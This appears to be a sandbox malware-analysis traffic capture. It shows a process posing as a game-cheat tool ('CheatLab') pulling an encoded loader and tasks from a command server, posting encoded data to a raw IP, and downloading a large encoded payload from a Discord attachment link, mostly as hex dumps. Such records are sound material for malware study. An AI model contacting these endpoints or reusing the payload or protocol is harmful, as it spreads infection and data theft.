                                                                                                                                                                                                                            Nov 4, 2023 01:35:15.187361956 CET105OUTData Raw: c8 fc 32 c6 fa 32 c6 f9 32 c8 fc 29 6e 7c 22 1b 05 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17
                                                                                                                                                                                                                            Data Ascii: 222)n|""""""""""""""""""""""""""% <dZ1C/</</</<0=JUI432222)m|""""""""""""""""""""""""""""
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391243935 CET4506INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Sat, 04 Nov 2023 00:35:22 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Content-Length: 2072
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IK8VFsx6cqyt90%2FMc9%2FP1nqgeffXRpm0bTt5AeyefpZU9WWvjLz54oPXAyi5vqkmyV58nYPgclB%2FdH0eE0i8xWGdxqf6xPyyusdOLVj9eK%2B581kI6h7aAYxrCe6r2aL2vkVaxDxbBII%2BGFnLwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            CF-RAY: 8208c6ce0bb23a8f-DME
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 6a 4d 73 4e 57 49 73 5a 44 49 73 59 6d 4d 73 59 6d 59 73 4f 54 49 73 59 7a 45 73 5a 47 59 73 59 57 49 73 59 6a 59 73 5a 44 41 73 59 6d 45 73 59 6d 59 73 5a 44 55 73 59 7a 59 73 4f 57 51 73 59 6a 59 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 49 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 4f 54 4d 73 59 6a 59 73 59 7a 55 73 5a 44 49 73 59 7a 63 73 5a 47 45 73 59 7a 59 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 59 54 45 73 4e 6d 59 73 4e 6d 59 73 4e 54 4d 73 59 7a 41 73 5a 44 45 73 59 6a 67 73 59 6a 4d 73 5a 54 41 73 59 7a 49 73 59 6d 51 73 59 32 59 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 5a 57 59 73 4e 32 4d 73 5a 54 45 73 59 6a 51 73 5a 54 51 73 59 54 67 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 4f 44 55 73 4f 54 55 73 4f 44 55 73 4f 54 55 73 4f 44 67 73 4e 7a 49 73 4e 54 67 73 4e 57 49 73 5a 54 4d 73 59 6a 63 73 59 6a 41 73 59 54 55 73 59 7a 4d 73 5a 47 59 73 4e 6d 55 73 4f 47 4d 73 4f 47 49 73 59 7a 67 73 59 32 4d 73 5a 47 4d 73 59 7a 63 73 59 6a 55 73 4e 7a 41 73 4f 54 51 73 4e 32 4d 73 5a 54 45 73 59 57 4d 73 5a 44 6b 73 59 57 59 73 4f 54 6b 73 59 54 59 73 4e 6a 4d 73 4f 47 49 73 4f 44 4d 73 5a 44 41 73 4f 44 63 73 59 32 4d 73 59 57 49 73 59 6a 41 73 59 57 51 73 4f 54 49 73 4e 32 51 73 4e 6d 59 73 4e 54 4d 73 4f 47 59 73 5a 47 45 73 4e 6d 4d 73 59 6a 63 73 5a 47 51 73 59 7a 59 73 59 7a 6b 73 5a 44 6b 73 4f 44 49 73 59 54 63 73 59 54 63 73 5a 44 63 73 59 32 59 73 5a 47 59 73 59 6d 51 73 5a 47 4d 73 59 54 63 73 4e 54 59 73 4e 57 55 73 4e 6a 45 73 4e 7a 4d 73 5a 44 59 73 59 7a 6b 73 59 7a 59 73 59 32 4d 73 59 6d 49 73 59 57 49 73 4e 57 49 73 59 57 45 73 4e 6a 4d 73 59 6a 55 73 4f 54 49 73 59 6d 45 73 5a 47 59 73 59 6a 45 73 59 32 59 73 4f 54 63 73 4e 7a 51 73 4e 32 4d 73 59 32 59 73 59 32 49 73 4f 57 4d 73 59 54 6b 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 4d 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 59 54 49 73 59 54 59 73 59 7a 4d 73 5a 44 59 73 59 6d 55 73 5a 44 67 73 59 32 4d 73 59 57 49 73 59 54 59 73 4f 57 4d 73 5a 44 55 73 4e 6a 55 73 4f 44 6b 73 4e 54 45 73 4e 32 59 73 5a 54 6b 73 22 2c 22 74 61
                                                                                                                                                                                                                            Data Ascii: {"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsODUsOTUsODUsOTUsODgsNzIsNTgsNWIsZTMsYjcsYjAsYTUsYzMsZGYsNmUsOGMsOGIsYzgsY2MsZGMsYzcsYjUsNzAsOTQsN2MsZTEsYWMsZDksYWYsOTksYTYsNjMsOGIsODMsZDAsODcsY2MsYWIsYjAsYWQsOTIsN2QsNmYsNTMsOGYsZGEsNmMsYjcsZGQsYzYsYzksZDksODIsYTcsYTcsZDcsY2YsZGYsYmQsZGMsYTcsNTYsNWUsNjEsNzMsZDYsYzksYzYsY2MsYmIsYWIsNWIsYWEsNjMsYjUsOTIsYmEsZGYsYjEsY2YsOTcsNzQsN2MsY2YsY2IsOWMsYTksOTYsOTQsOGQsN2MsYTMsNjMsNTYsYTIsYTYsYzMsZDYsYmUsZDgsY2MsYWIsYTYsOWMsZDUsNjUsODksNTEsN2YsZTks","ta
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391278028 CET4507INData Raw: 73 6b 73 22 3a 22 4f 54 4d 73 59 6a 51 73 4f 54 49 73 59 57 4d 73 59 6a 4d 73 4e 54 4d 73 4f 44 67 73 4f 47 4d 73 4f 44 4d 73 4f 44 59 73 4f 57 51 73 4f 44 41 73 4e 32 45 73 4f 44 6b 73 59 32 55 73 59 54 45 73 59 6a 49 73 5a 47 59 73 4e 32 4d 73
                                                                                                                                                                                                                            Data Ascii: sks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZ
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.391295910 CET4507INData Raw: 59 6a 45 73 4e 57 49 73 5a 57 51 73 4e 6d 59 73 4e 6d 59 73 4e 54 4d 73 59 6a 49 73 5a 44 45 73 59 6a 67 73 59 6d 49 73 5a 54 45 73 59 6a 6b 73 59 32 4d 73 5a 54 41 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 4f 54 59 73 59 6d 49 73 5a 47 49 73 59 7a
                                                                                                                                                                                                                            Data Ascii: YjEsNWIsZWQsNmYsNmYsNTMsYjIsZDEsYjgsYmIsZTEsYjksY2MsZTAsODQsNzIsNjQsOTYsYmIsZGIsYzQsOTksYzAsOTEs"}
                                                                                                                                                                                                                            Nov 4, 2023 01:35:59.839562893 CET6386OUTPUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            User-Agent: Sun
                                                                                                                                                                                                                            Host: 193.37.71.112
                                                                                                                                                                                                                            Content-Length: 95
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 41 73 4f 44 51 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d
                                                                                                                                                                                                                            Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
                                                                                                                                                                                                                            Nov 4, 2023 01:36:00.270839930 CET6386INHTTP/1.1 204 No Content
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Sat, 04 Nov 2023 00:36:00 GMT
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RNyNWkQjmrNampJVvj1NN0G0aV8kqLQS4xqJ8GRJvweiIog5NW8WbQsEwooHsjRvkd9oE%2BlxGYRFPIBTVV5UElDRcZaAOLIXMMmKKo2tSJPYNJ41NiCLVKEOSQN8mj9AzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            CF-RAY: 8208c7bbfb7b5b74-FRA
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            3192.168.2.449737162.159.129.23380C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.728439093 CET4535OUTGET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            User-Agent: Sun
                                                                                                                                                                                                                            Host: cdn.discordapp.com
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.832062960 CET4536INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Date: Sat, 04 Nov 2023 00:35:22 GMT
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                                                                                                            Expires: Sat, 04 Nov 2023 01:35:22 GMT
                                                                                                                                                                                                                            Location: https://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                                                                                                                                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                            Set-Cookie: __cf_bm=vzDilFX81rCrohiK_cZRBQnHBqHe6JFSPhjTxmdCqDE-1699058122-0-AcLNLQSLjqqaZzelUcLoZwHhxs7Mf6nWVkiH6CXWVvIrpbuioE6k9W3MZAlLzF8K9Y8kKxs8tluEsFIYrhg9eH4=; path=/; expires=Sat, 04-Nov-23 01:05:22 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qob2ExC5YPq%2FLUy4nmKfehQrFFc%2BzREhrl6Mz%2FaXxzRvRuNieg5Sy2wl7dTAUAAOQJzaFKT5aInxf4t6eY0milHjz6dz0vMlrqLX7AKk23tUkzUqUOg0%2BnGUeeG2dznHerU5BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Set-Cookie: _cfuvid=OLsD0ow_yPIGa0RwhYfCL4rW0rvKLFQKwVPlV1avm30-1699058122773-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8208c6d34ce057cd-IAD
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            0192.168.2.449738162.159.129.233443C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC0OUTGET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Sun
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Host: cdn.discordapp.com
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cookie: __cf_bm=vzDilFX81rCrohiK_cZRBQnHBqHe6JFSPhjTxmdCqDE-1699058122-0-AcLNLQSLjqqaZzelUcLoZwHhxs7Mf6nWVkiH6CXWVvIrpbuioE6k9W3MZAlLzF8K9Y8kKxs8tluEsFIYrhg9eH4=; _cfuvid=OLsD0ow_yPIGa0RwhYfCL4rW0rvKLFQKwVPlV1avm30-1699058122773-0-604800000
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sat, 04 Nov 2023 00:35:23 GMT
                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 1807199
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            CF-Ray: 8208c6d678ad5866-IAD
                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                            Content-Disposition: attachment; filename="2.txt"
                                                                                                                                                                                                                            ETag: "f4206dcdebda4c957baa06ba3c826c08"
                                                                                                                                                                                                                            Expires: Sun, 03 Nov 2024 00:35:23 GMT
                                                                                                                                                                                                                            Last-Modified: Thu, 02 Nov 2023 07:38:47 GMT
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            x-goog-generation: 1698910727777197
                                                                                                                                                                                                                            x-goog-hash: crc32c=qEYgSw==
                                                                                                                                                                                                                            x-goog-hash: md5=9CBtzevaTJV7qga6PIJsCA==
                                                                                                                                                                                                                            x-goog-metageneration: 1
                                                                                                                                                                                                                            x-goog-storage-class: STANDARD
                                                                                                                                                                                                                            x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                            x-goog-stored-content-length: 1807199
                                                                                                                                                                                                                            X-GUploader-UploadID: ABPtcPpfHun787ppLwCHea-oKo3b86L8KTSddJoKwUkU1ONP_SuGHhJ_Zix-jXrcBhKggW4iEDLjGFsHeg
                                                                                                                                                                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4PqsIbUEyZQgrFuK7qcz5fZjo0GP4wVvvah6JafR6MDFxdiHbDyWfCaoxvcuo0%2BFjgxKDoSytwK5IjefBJ4OOYkWrA77WlqQO0z%2FVW%2BZrFaOvN7r19uNh%2BMnzT%2BH7c9i6rKJEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1INData Raw: 38 35 2c 39 33 2c 31 30 30 2c 34 33 2c 35 32 2c 33 31 2c 34 65 2c 36 63 2c 35 30 2c 35 32 2c 36 62 2c 35 34 2c 31 35 39 2c 31 36 36 2c 36 32 2c 33 38 2c 66 63 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 37 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 31 33 35 2c 36 35 2c 35 38 2c 34 36 2c 34 36 2c 35 38 2c 31 32 61 2c 35 31 2c 34 66 2c 65 35 2c 35 37 2c 31 33 39 2c 36 64 2c 31 30 61 2c 36 63 2c 61 30 2c 31 32 37 2c 38 38 2c 62 36 2c 61 30 2c 61 64 2c 65 37 2c 37
                                                                                                                                                                                                                            Data Ascii: 85,93,100,43,52,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,135,65,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b6,a0,ad,e7,7
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC2INData Raw: 37 2c 34 33 2c 33 34 2c 33 32 2c 31 33 31 2c 35 32 2c 36 33 2c 61 35 2c 36 36 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 36 30 2c 62 35 2c 62 36 2c 64 62 2c 63 39 2c 36 35 2c 35 38 2c 34 36 2c 37 35 2c 64 63 2c 37 31 2c 34 33 2c 34 66 2c 34 31 2c 34 65 2c 36 63 2c 34 63 2c 66 36 2c 36 63 2c 35 34 2c 35 61 2c 36 62 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 37 35 2c 36 35 2c 35 38 2c 61 36 2c 36 36 2c 61 62 2c 64 35 2c 61 66 2c 62 65 2c 39 34 2c 34 65 2c 36 63 2c 61 33 2c 37 36 2c
                                                                                                                                                                                                                            Data Ascii: 7,43,34,32,131,52,63,a5,66,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,60,b5,b6,db,c9,65,58,46,75,dc,71,43,4f,41,4e,6c,4c,f6,6c,54,5a,6b,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,75,65,58,a6,66,ab,d5,af,be,94,4e,6c,a3,76,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC4INData Raw: 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34
                                                                                                                                                                                                                            Data Ascii: 3,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,4
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC5INData Raw: 39 2c 37 30 2c 64 30 2c 64 63 2c 38 31 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 31 33 61 2c 31 35 64 2c 36 37 2c 35 61 2c 36 37 2c 37 31 2c 65 65 2c 63 39 2c 65 33 2c 31 35 39 2c 31 36 63 2c 31 34 61 2c 66 63 2c 31 30 33 2c 61 38 2c 35 61 2c 31 30 38 2c 64 36 2c 64 62 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 38 33 2c 33 38 2c 33 39 2c 37 30 2c 31 32 65 2c 35 65 2c 62 63 2c 64 62 2c 65 34 2c 31 34 62 2c 31 35 31 2c 31 36 61 2c 64 37 2c 31 34 33 2c 36 38 2c 65 62 2c 63 35 2c 62 63 2c 31 37 33 2c 31 35 39 2c 31 36 63 2c 63 65 2c 31 33 34 2c 62 62 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 35 31 2c 65 31 2c 35 39 2c 31 35 30 2c 31 33 65 2c 31 33 31 2c 31 31 63 2c 66 33 2c 37 31 2c 34 33 2c 34 66 2c 33 31 2c 64 33 2c 31 33 65 2c 63 30 2c 37 61 2c 31 33 32 2c 64 39 2c
                                                                                                                                                                                                                            Data Ascii: 9,70,d0,dc,81,14d,16b,14b,13a,15d,67,5a,67,71,ee,c9,e3,159,16c,14a,fc,103,a8,5a,108,d6,db,154,164,157,83,38,39,70,12e,5e,bc,db,e4,14b,151,16a,d7,143,68,eb,c5,bc,173,159,16c,ce,134,bb,133,131,140,51,e1,59,150,13e,131,11c,f3,71,43,4f,31,d3,13e,c0,7a,132,d9,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC6INData Raw: 31 32 32 2c 61 63 2c 36 30 2c 31 33 62 2c 39 66 2c 31 34 64 2c 38 32 2c 37 37 2c 34 33 2c 33 34 2c 31 31 64 2c 34 61 2c 64 63 2c 62 30 2c 31 33 35 2c 65 38 2c 31 34 31 2c 34 37 2c 63 31 2c 38 36 2c 31 35 30 2c 63 36 2c 63 63 2c 31 31 31 2c 34 65 2c 65 61 2c 35 30 2c 31 33 64 2c 31 35 61 2c 31 33 66 2c 31 34 37 2c 63 66 2c 31 30 36 2c 31 32 61 2c 38 35 2c 37 34 2c 65 35 2c 62 61 2c 35 33 2c 31 35 66 2c 34 39 2c 34 36 2c 33 32 2c 34 31 2c 64 63 2c 61 38 2c 35 64 2c 66 30 2c 31 33 64 2c 61 33 2c 66 61 2c 34 64 2c 37 30 2c 31 30 66 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 65 65 2c 31 33 37 2c 31 32 37 2c 34 33 2c 33 34 2c 33 32
                                                                                                                                                                                                                            Data Ascii: 122,ac,60,13b,9f,14d,82,77,43,34,11d,4a,dc,b0,135,e8,141,47,c1,86,150,c6,cc,111,4e,ea,50,13d,15a,13f,147,cf,106,12a,85,74,e5,ba,53,15f,49,46,32,41,dc,a8,5d,f0,13d,a3,fa,4d,70,10f,11b,fd,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,ee,137,127,43,34,32
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC8INData Raw: 2c 36 32 2c 36 62 2c 35 34 2c 63 32 2c 65 66 2c 31 35 36 2c 37 39 2c 34 34 2c 31 30 31 2c 65 37 2c 63 64 2c 31 34 61 2c 31 37 36 2c 31 34 32 2c 31 31 63 2c 62 36 2c 35 31 2c 35 31 2c 36 33 2c 61 35 2c 63 64 2c 31 33 38 2c 31 33 61 2c 37 39 2c 33 39 2c 66 64 2c 64 30 2c 39 33 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 31 33 34 2c 63 35 2c 37 62 2c 35 34 2c 35 61 2c 62 37 2c 31 34 61 2c 35 35 2c 36 39 2c 37 34 2c 35 61 2c 66 30 2c 31 30 66 2c 37 66 2c 63 62 2c 62 39 2c 62 31 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 65 32 2c 66 32 2c 39 63 2c 31 34 35 2c 31 33 37 2c 31 33 38 2c 31 35 38 2c 64 63 2c 35 66 2c 33 31 2c 34 65 2c 66 39 2c 64 39 2c 62 32 2c 31 36 61 2c 31 35 33 2c 31 35 39 2c 31 34 66 2c 66 30 2c 34 38 2c 34 34 2c 37 34 2c 36 39 2c 31 32 33 2c 64 30 2c
                                                                                                                                                                                                                            Data Ascii: ,62,6b,54,c2,ef,156,79,44,101,e7,cd,14a,176,142,11c,b6,51,51,63,a5,cd,138,13a,79,39,fd,d0,93,130,14d,16b,134,c5,7b,54,5a,b7,14a,55,69,74,5a,f0,10f,7f,cb,b9,b1,140,150,162,e2,f2,9c,145,137,138,158,dc,5f,31,4e,f9,d9,b2,16a,153,159,14f,f0,48,44,74,69,123,d0,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC9INData Raw: 31 35 62 2c 31 33 37 2c 31 33 66 2c 66 38 2c 61 31 2c 31 31 36 2c 31 34 66 2c 39 30 2c 34 37 2c 34 34 2c 37 34 2c 65 35 2c 31 35 32 2c 61 38 2c 31 33 39 2c 34 62 2c 33 34 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 63 34 2c 31 33 62 2c 34 35 2c 34 66 2c 36 63 2c 34 63 2c 64 62 2c 66 38 2c 31 34 30 2c 31 35 38 2c 31 36 36 2c 31 36 31 2c 61 30 2c 62 30 2c 31 36 39 2c 39 62 2c 36 64 2c 64 38 2c 63 34 2c 31 31 37 2c 31 31 63 2c 66 36 2c 34 66 2c 35 31 2c 36 33 2c 31 33 32 2c 36 61 2c 37 38 2c 31 34 34 2c 37 39 2c 33 39 2c 31 34 64 2c 61 30 2c 31 33 66 2c 39 39 2c 65 36 2c 31 36 31 2c 38 64 2c 35 32 2c 66 38 2c 61 31 2c 31 31 32 2c 31 34 66 2c 31 31 30 2c 34 36 2c 34 34 2c 37 34
                                                                                                                                                                                                                            Data Ascii: 15b,137,13f,f8,a1,116,14f,90,47,44,74,e5,152,a8,139,4b,34,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,c4,13b,45,4f,6c,4c,db,f8,140,158,166,161,a0,b0,169,9b,6d,d8,c4,117,11c,f6,4f,51,63,132,6a,78,144,79,39,14d,a0,13f,99,e6,161,8d,52,f8,a1,112,14f,110,46,44,74
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC11INData Raw: 33 38 2c 31 32 34 2c 37 39 2c 63 65 2c 39 63 2c 64 39 2c 64 31 2c 31 35 35 2c 34 64 2c 64 62 2c 62 38 2c 66 63 2c 64 64 2c 65 34 2c 31 30 61 2c 33 38 2c 63 32 2c 37 38 2c 31 34 35 2c 31 35 63 2c 31 33 36 2c 31 36 34 2c 37 36 2c 31 30 36 2c 61 36 2c 35 64 2c 31 31 38 2c 61 38 2c 66 39 2c 61 33 2c 35 38 2c 34 36 2c 33 38 2c 31 32 34 2c 37 39 2c 63 65 2c 39 34 2c 64 35 2c 64 31 2c 31 35 34 2c 34 64 2c 64 62 2c 62 30 2c 66 38 2c 64 64 2c 65 34 2c 31 30 36 2c 33 38 2c 63 32 2c 37 38 2c 31 34 35 2c 31 35 63 2c 31 33 36 2c 31 36 34 2c 61 62 2c 34 30 2c 31 32 39 2c 38 32 2c 35 31 2c 65 65 2c 61 32 2c 36 64 2c 31 34 30 2c 36 33 2c 34 35 2c 33 39 2c 37 30 2c 64 30 2c 39 63 2c 65 39 2c 31 33 36 2c 63 31 2c 35 39 2c 35 32 2c 36 62 2c 65 31 2c 61 37 2c 31 33 62 2c 31
